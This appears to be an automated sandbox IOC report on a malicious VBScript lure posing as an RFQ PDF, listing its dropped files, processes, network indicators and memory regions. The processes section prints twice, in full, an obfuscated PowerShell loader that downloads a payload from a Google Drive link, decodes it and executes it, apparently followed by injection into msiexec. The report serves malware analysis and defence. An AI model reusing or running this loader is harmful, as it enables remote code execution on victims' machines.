IOC Report
RFQ_24196MR_PDF.vbs

loading gif

Files

File Path
Type
Category
Malicious
RFQ_24196MR_PDF.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msiexec.exe_5bf5219ded9fba7eedec77d072a1c9e5c7a57c4_4aa59577_bced51df-f61f-4fea-9980-4eb0aca94c31\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD38.tmp.dmp
Mini DuMP crash report, 14 streams, Fri Oct 25 17:44:13 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE81.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCEA1.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkgx4jan.30z.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o42kqqmh.lxh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otjk2z2d.zfa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spxg54pp.rr4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Solidifiable.Sch
ASCII text, with very long lines (65536), with no line terminators
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkl. Precs ennepStandLRevisiSyr rtStive(C.lpi$B.unhuPreden AltaPBrolgr U etiDualiNSulfocBe.aaiHelioPMi dea Out.l Ga.n)B per ');Salvierne (Katabolize $Klaner);$Achinese=$Chairmending[0];$jeff=(Katabolize 'I,akt$FjernGnondeLOpslaOUnna BlinaraMorgul Af.o:Odenus DftvKExactaZoom THarattVifteE PhenPA lycl freni MagiG Flokt rdblSB irnrNeuroE G orgArthrLCloseeJamreRParisn Lrere Beha= Epi,nSvigeELandvW C.tl-WaterOHer.iB,pilljVaregeTilpac AntaTprete ColopSEquimy LretsGastrTTypogEcasenMInter.FigurNFortyEClamoTMicro.Pa alWLoot.EInve BfremsC KiwiLTommei .ognEUdskrNImprot.onpe ');Salvierne ($jeff);Salvierne (Katabolize 'Habit$UnigeSMythik GyroaK nkutOkkertAna.teOm kip eerelWor.biacc,igErhvetThrupsPrisorS naleSki kgm llolUngueeBurtir CholnStudee,nson. rodeH Milie ledia Sn.vdHoldke FirprUmor sStudi[Dovne$ValveU spildT ldkeThe.tkScalaaH fremTrykkp iskeeAbte nDiaz,e TornsErhve] Shap=S ige$CeliaDDeligi Rv rsSnickkNummme Ri,etPal ot Raree OpklsBet ttKlingr roseeF,edrl Fjers.anniemic,erO.ryknZoblee Aand ');$Staldes61=Katabolize ' Preu$factiSRektokUtjleaMo.odtlignitConnueSeppsp W ndl Uni iBarndgLipart ,dvls Cestr ResseIndplgUd,nrlVer neA lomrRens nIntereTreat. mrt DPro eoS quewFavisn Elecl OmlgoTheolaRese,dPteryFGalliiPetrolLivsneJudge(Hagen$Indt AAnkhhcDv hjh Hairi Vainn Gaffe Sca.sGaffeeBevar, Be.r$ DdsaM mor.eKan.lm Ge.io SeemrSituai semia ,atal AutoiFiliazMelaneservir Equi)Aor i ';$Memorializer=$Vesteuropers;Salvierne (Katabolize 'Nestl$Re.utgT lbeLJordvo,gnspBGenanaSjlevlpurpo: O,taV AcquEG ldmnDybd.eMod lRS tariFr aaa BistlPause=Bronk(Ukrtst ,risE Ad aS PhratSpnde-BroklpNove.aSaventParomh H lk Samm$Pseu MOutyiE F.lemParakoPumelr roekITydelAH licL.elatIKommeZDisseenonnir Udfo)nytte ');while (!$Venerial) {Salvierne (Katabolize 'magi $T stigcancrlElaeooModerbTmmeraOxsholHavka:UforsK A.prvBlokfiInforv,jersaKonvelSarcoebiphenParrhsFrekieKulegrsombrn Towne Anti=D,cet$stilstDisgirS.ockuSlusee Dobb ') ;Salvierne $Staldes61;Salvierne (Katabolize 'EfterS A,tstLambeaPoritrCarabtUnvol- Extos Immel Lstee VandeF,rmaPSk ts Glycf4 odd ');Salvierne (Katabolize 'Subfu$Opklog Pr dL urhno Prosb laa aBra,dL Fe s: IdeaVForsyE,fmaanReferEFairyRUudf IFecunAF,ugtLAfhol=Genne( Be at geguEAnstrSTavleTBogma-Uz ekpSnoreaBilagt DoktHProfe Trrel$A tromtro seEngloMPensiococklrAngboiDunama E,swLNontrIThranz aihEInd,cr Oege)Ovovi ') ;Salvierne (Katabolize ' sust$Pag ng Uncol S,veoL bstBManipA sutlLpredo:SpileBCruroI S lplUnderSCrede=Bref $Kna hgSkmteLi,dkaoB.yauBKnockA evanlMicri: BallFsekunDOatmeE grierT,enaaAmarot PersIDiwa OAuxo.NUltraeDarshRMa.han SemieStemmSHogge+H per+Dec n% Fo e$Mess CTilskh,olffaReta IFirmarFrogeM.ifehECompunMicrodAlismiTnkebNVestsgPoint.HypercA,skiO Cytoufadern H drtS omi ') ;$Achinese=$Chairmending[$Bils];}$Gershwin=294146;$Runologs=30619;Salvierne (Katabolize 'Leitn$Boos GSystel Te,eo redibHoaxaA ov rLMenne:coetas Lu rULat,okHet rUMosel slemm=Panel coo cgTra seSnotttLini,- ilkwCCr scoKontrnfinantJas.iEBeskfNChumsTCoypu Elev $Un lam aspeEsupermHalshO SkaaROpslaIRemisaContolPlec.IFjeldZAnsaeE Sam r B av ');Salvierne (Katabolize 'Staal$LnestgKarial,oloko Kubibnon,paB,usclHalvf:Sen sCSynalo GrizrFormui Co uoBev llru icaHerednAlloiu PoetsD sla fortr=Splej Crosb[DemilS pookyTbru,sAppentConfie PostmTandf.InsucCAlm eorelaxnSympavRagf eVascurRubeotHaar ]Bala.:dy.sm:AberiFLandsrUmot.oLec,nm,arthB Kri,a Re asDagdreB,egn6Frkri4MarsiSrunketSwamprD graiV,dernLandsgR.bec(Strej$BabylSNoteduDistik Pinsu Skif)K.lon ');Salvierne (Katabolize 'Lunkn$EveryG HusklWeakmOSnekkbStatuATam yLSyste:frasokLivsfOS rmsNso twS SejluSkattmSpi aP,tiditAest iGtestOVaflenAffin Spraw=Swing Bered[ RecrS TeksyAblepsF yttT retE ParamAccel. ChanT NonfEOpsnaxGron tunike. Rdtkeflettn Ud yCForkooEsko.DComanIS rrenAndangIn,ra] lari: Pyro:LydbaaBar.nsStreaCLreprIMetalIHomof. SaarG rek e FibrTSacrischyloTMusetRCranciBayonnulvemg Be i(Dios $Armfuc StikOPriorRBugbaIsuc,eOnatteLSprgea achsnEkspeuIndmaSPale.)Befre ');Salvierne (Katabolize 'Hoove$NonpeGSygeslRednioLeflebDefasAHgneslqu nt: orfasInficuFo valMonomF,omsaoBu,ttnLandmePowderItlloEkolikRFunkt=Ariad$BrepikMadisOTakeanAtt kS R,mfU HalvMPluriPIncortColloiTelefOUnpenNTi sb.Langns ForhuUnde bUn.erSServ Tres sR RengI InconBun eg Ha.k( Atta$ Pu lgBibesEDolo rStyrkscalamHAnt bW laniWoubiNf.yve,Stiko$ exacRTeaboUV,nneNInimiOS lvslTilfoOTilegg Ivr.s Brnd)Slvkr ');Salvierne $Sulfonerer;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkl. Precs ennepStandLRevisiSyr rtStive(C.lpi$B.unhuPreden AltaPBrolgr U etiDualiNSulfocBe.aaiHelioPMi dea Out.l Ga.n)B per ');Salvierne (Katabolize $Klaner);$Achinese=$Chairmending[0];$jeff=(Katabolize 'I,akt$FjernGnondeLOpslaOUnna BlinaraMorgul Af.o:Odenus DftvKExactaZoom THarattVifteE PhenPA lycl freni MagiG Flokt rdblSB irnrNeuroE G orgArthrLCloseeJamreRParisn Lrere Beha= Epi,nSvigeELandvW C.tl-WaterOHer.iB,pilljVaregeTilpac AntaTprete ColopSEquimy LretsGastrTTypogEcasenMInter.FigurNFortyEClamoTMicro.Pa alWLoot.EInve BfremsC KiwiLTommei .ognEUdskrNImprot.onpe ');Salvierne ($jeff);Salvierne (Katabolize 'Habit$UnigeSMythik GyroaK nkutOkkertAna.teOm kip eerelWor.biacc,igErhvetThrupsPrisorS naleSki kgm llolUngueeBurtir CholnStudee,nson. rodeH Milie ledia Sn.vdHoldke FirprUmor sStudi[Dovne$ValveU spildT ldkeThe.tkScalaaH fremTrykkp iskeeAbte nDiaz,e TornsErhve] Shap=S ige$CeliaDDeligi Rv rsSnickkNummme Ri,etPal ot Raree OpklsBet ttKlingr roseeF,edrl Fjers.anniemic,erO.ryknZoblee Aand ');$Staldes61=Katabolize ' Preu$factiSRektokUtjleaMo.odtlignitConnueSeppsp W ndl Uni iBarndgLipart ,dvls Cestr ResseIndplgUd,nrlVer neA lomrRens nIntereTreat. mrt DPro eoS quewFavisn Elecl OmlgoTheolaRese,dPteryFGalliiPetrolLivsneJudge(Hagen$Indt AAnkhhcDv hjh Hairi Vainn Gaffe Sca.sGaffeeBevar, Be.r$ DdsaM mor.eKan.lm Ge.io SeemrSituai semia ,atal AutoiFiliazMelaneservir Equi)Aor i ';$Memorializer=$Vesteuropers;Salvierne (Katabolize 'Nestl$Re.utgT lbeLJordvo,gnspBGenanaSjlevlpurpo: O,taV AcquEG ldmnDybd.eMod lRS tariFr aaa BistlPause=Bronk(Ukrtst ,risE Ad aS PhratSpnde-BroklpNove.aSaventParomh H lk Samm$Pseu MOutyiE F.lemParakoPumelr roekITydelAH licL.elatIKommeZDisseenonnir Udfo)nytte ');while (!$Venerial) {Salvierne (Katabolize 'magi $T stigcancrlElaeooModerbTmmeraOxsholHavka:UforsK A.prvBlokfiInforv,jersaKonvelSarcoebiphenParrhsFrekieKulegrsombrn Towne Anti=D,cet$stilstDisgirS.ockuSlusee Dobb ') ;Salvierne $Staldes61;Salvierne (Katabolize 'EfterS A,tstLambeaPoritrCarabtUnvol- Extos Immel Lstee VandeF,rmaPSk ts Glycf4 odd ');Salvierne (Katabolize 'Subfu$Opklog Pr dL urhno Prosb laa aBra,dL Fe s: IdeaVForsyE,fmaanReferEFairyRUudf IFecunAF,ugtLAfhol=Genne( Be at geguEAnstrSTavleTBogma-Uz ekpSnoreaBilagt DoktHProfe Trrel$A tromtro seEngloMPensiococklrAngboiDunama E,swLNontrIThranz aihEInd,cr Oege)Ovovi ') ;Salvierne (Katabolize ' sust$Pag ng Uncol S,veoL bstBManipA sutlLpredo:SpileBCruroI S lplUnderSCrede=Bref $Kna hgSkmteLi,dkaoB.yauBKnockA evanlMicri: BallFsekunDOatmeE grierT,enaaAmarot PersIDiwa OAuxo.NUltraeDarshRMa.han SemieStemmSHogge+H per+Dec n% Fo e$Mess CTilskh,olffaReta IFirmarFrogeM.ifehECompunMicrodAlismiTnkebNVestsgPoint.HypercA,skiO Cytoufadern H drtS omi ') ;$Achinese=$Chairmending[$Bils];}$Gershwin=294146;$Runologs=30619;Salvierne (Katabolize 'Leitn$Boos GSystel Te,eo redibHoaxaA ov rLMenne:coetas Lu rULat,okHet rUMosel slemm=Panel coo cgTra seSnotttLini,- ilkwCCr scoKontrnfinantJas.iEBeskfNChumsTCoypu Elev $Un lam aspeEsupermHalshO SkaaROpslaIRemisaContolPlec.IFjeldZAnsaeE Sam r B av ');Salvierne (Katabolize 'Staal$LnestgKarial,oloko Kubibnon,paB,usclHalvf:Sen sCSynalo GrizrFormui Co uoBev llru icaHerednAlloiu PoetsD sla fortr=Splej Crosb[DemilS pookyTbru,sAppentConfie PostmTandf.InsucCAlm eorelaxnSympavRagf eVascurRubeotHaar ]Bala.:dy.sm:AberiFLandsrUmot.oLec,nm,arthB Kri,a Re asDagdreB,egn6Frkri4MarsiSrunketSwamprD graiV,dernLandsgR.bec(Strej$BabylSNoteduDistik Pinsu Skif)K.lon ');Salvierne (Katabolize 'Lunkn$EveryG HusklWeakmOSnekkbStatuATam yLSyste:frasokLivsfOS rmsNso twS SejluSkattmSpi aP,tiditAest iGtestOVaflenAffin Spraw=Swing Bered[ RecrS TeksyAblepsF yttT retE ParamAccel. ChanT NonfEOpsnaxGron tunike. Rdtkeflettn Ud yCForkooEsko.DComanIS rrenAndangIn,ra] lari: Pyro:LydbaaBar.nsStreaCLreprIMetalIHomof. SaarG rek e FibrTSacrischyloTMusetRCranciBayonnulvemg Be i(Dios $Armfuc StikOPriorRBugbaIsuc,eOnatteLSprgea achsnEkspeuIndmaSPale.)Befre ');Salvierne (Katabolize 'Hoove$NonpeGSygeslRednioLeflebDefasAHgneslqu nt: orfasInficuFo valMonomF,omsaoBu,ttnLandmePowderItlloEkolikRFunkt=Ariad$BrepikMadisOTakeanAtt kS R,mfU HalvMPluriPIncortColloiTelefOUnpenNTi sb.Langns ForhuUnde bUn.erSServ Tres sR RengI InconBun eg Ha.k( Atta$ Pu lgBibesEDolo rStyrkscalamHAnt bW laniWoubiNf.yve,Stiko$ exacRTeaboUV,nneNInimiOS lvslTilfoOTilegg Ivr.s Brnd)Slvkr ');Salvierne $Sulfonerer;"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 2292

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://drive.usercontent.google.com(
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.usercontent.googh
unknown
https://drive.usercontent.google.com/
unknown
http://drive.google.com
unknown
https://drive.google.com/5f
unknown
https://github.com/Pester/Pester
unknown
https://www.google.com
unknown
https://drive.google.com/=f
unknown
https://drive.googPR
unknown
http://crl.micro
unknown
https://aka.ms/pscore6lBdq
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 15 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
142.250.185.238
drive.usercontent.google.com
172.217.16.193

IPs

IP
Domain
Country
Malicious
172.217.16.193
drive.usercontent.google.com
United States
142.250.185.238
drive.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
8610000
direct allocation
page execute and read and write
malicious
5665000
trusted library allocation
page read and write
malicious
1DEEBB8F000
trusted library allocation
page read and write
malicious
8DD5000
direct allocation
page execute and read and write
malicious
7FFD9BA40000
trusted library allocation
page read and write
1DEDB860000
heap
page readonly
64C000
stack
page read and write
6FC3AFB000
stack
page read and write
1DEDB870000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
464D000
trusted library allocation
page read and write
2109F175000
heap
page read and write
1DEDC04B000
trusted library allocation
page read and write
2A2D000
heap
page read and write
20B3F000
stack
page read and write
8210000
heap
page read and write
2C6E000
stack
page read and write
1DED9E84000
heap
page read and write
7450000
trusted library allocation
page read and write
6EEE000
heap
page read and write
2D30000
trusted library allocation
page read and write
804E000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
2109EF4F000
heap
page read and write
1DEDDC56000
trusted library allocation
page read and write
6ADF000
stack
page read and write
2CC0000
trusted library section
page read and write
55F1000
trusted library allocation
page read and write
71E0000
heap
page read and write
76F68FE000
stack
page read and write
58DF000
heap
page read and write
2CF9000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1DEDBAE0000
heap
page execute and read and write
1DEDBBA6000
trusted library allocation
page read and write
6FC31FE000
stack
page read and write
58D8000
heap
page read and write
2101E000
stack
page read and write
1DED9E30000
heap
page read and write
2D15000
trusted library allocation
page execute and read and write
7FFD9B9E0000
trusted library allocation
page read and write
3C60000
remote allocation
page execute and read and write
76F790B000
stack
page read and write
70CE000
stack
page read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
7490000
trusted library allocation
page read and write
27C0000
heap
page read and write
211A0000
heap
page execute and read and write
20F1C000
stack
page read and write
1DEF41AB000
heap
page read and write
81CC000
stack
page read and write
2109EEE4000
heap
page read and write
2109EF38000
heap
page read and write
1DEF41B9000
heap
page read and write
4580000
trusted library allocation
page read and write
210A09B7000
heap
page read and write
5850000
direct allocation
page read and write
1DEEBB30000
trusted library allocation
page read and write
7FFD9B93A000
trusted library allocation
page read and write
20E2E000
stack
page read and write
210A09AF000
heap
page read and write
85BE000
stack
page read and write
454E000
stack
page read and write
7480000
trusted library allocation
page read and write
689000
stack
page read and write
20BBC000
stack
page read and write
6FC37FE000
stack
page read and write
29E5000
unkown
page read and write
2109EF12000
heap
page read and write
2109EF68000
heap
page read and write
1DEF4000000
heap
page read and write
76F636E000
stack
page read and write
6C40000
direct allocation
page read and write
2109EF15000
heap
page read and write
2109EEA9000
heap
page read and write
2CE0000
trusted library allocation
page read and write
586A000
heap
page read and write
72C0000
heap
page read and write
6CA0000
direct allocation
page read and write
74A0000
trusted library allocation
page read and write
82DC000
heap
page read and write
2109EEAD000
heap
page read and write
82B0000
trusted library allocation
page read and write
2109EE60000
heap
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
2109EF09000
heap
page read and write
3D85000
remote allocation
page execute and read and write
20E80000
direct allocation
page read and write
8010000
trusted library allocation
page read and write
58E1000
heap
page read and write
2109EEBC000
heap
page read and write
210A097F000
heap
page read and write
210A14B0000
heap
page read and write
5925000
heap
page read and write
6C90000
direct allocation
page read and write
8640000
direct allocation
page read and write
7FFD9B920000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
20EDC000
stack
page read and write
6FC33FF000
stack
page read and write
1DEDC043000
trusted library allocation
page read and write
206E0000
direct allocation
page read and write
7F10000
trusted library allocation
page execute and read and write
1DEF3E74000
heap
page read and write
29D9000
unkown
page read and write
210A0978000
heap
page read and write
210A0971000
heap
page read and write
206C0000
direct allocation
page read and write
45DE000
stack
page read and write
2A00000
heap
page read and write
1DEF41A7000
heap
page read and write
45F1000
trusted library allocation
page read and write
2CE3000
trusted library allocation
page execute and read and write
58E4000
heap
page read and write
58CD000
heap
page read and write
6C30000
direct allocation
page read and write
7FFD9BB00000
trusted library allocation
page read and write
70F2000
heap
page read and write
74E0000
trusted library allocation
page read and write
2C2F000
stack
page read and write
6C50000
direct allocation
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
20710000
direct allocation
page read and write
76F6CBF000
stack
page read and write
29EB000
unkown
page read and write
73A0000
trusted library allocation
page read and write
2109EF2C000
heap
page read and write
1DEF41C7000
heap
page read and write
1DEF3F22000
heap
page read and write
6FC36FE000
stack
page read and write
7F60000
heap
page read and write
210A09BE000
heap
page read and write
704E000
stack
page read and write
1DEDB975000
heap
page read and write
2109EEF5000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
8020000
trusted library allocation
page read and write
2109EF71000
heap
page read and write
5657000
trusted library allocation
page read and write
2109EF42000
heap
page read and write
1DEF412C000
heap
page read and write
1DEDC047000
trusted library allocation
page read and write
6CEE000
stack
page read and write
8630000
direct allocation
page read and write
2109EF42000
heap
page read and write
1DEDBD47000
trusted library allocation
page read and write
5185000
remote allocation
page execute and read and write
20730000
direct allocation
page read and write
2A61000
heap
page read and write
2CD0000
trusted library allocation
page read and write
76F677C000
stack
page read and write
8550000
trusted library allocation
page read and write
210A0988000
heap
page read and write
2CF0000
trusted library allocation
page read and write
6A10000
heap
page execute and read and write
755B000
stack
page read and write
2700000
trusted library allocation
page read and write
1DEDDC3E000
trusted library allocation
page read and write
76F6AB9000
stack
page read and write
8680000
direct allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
8600000
trusted library allocation
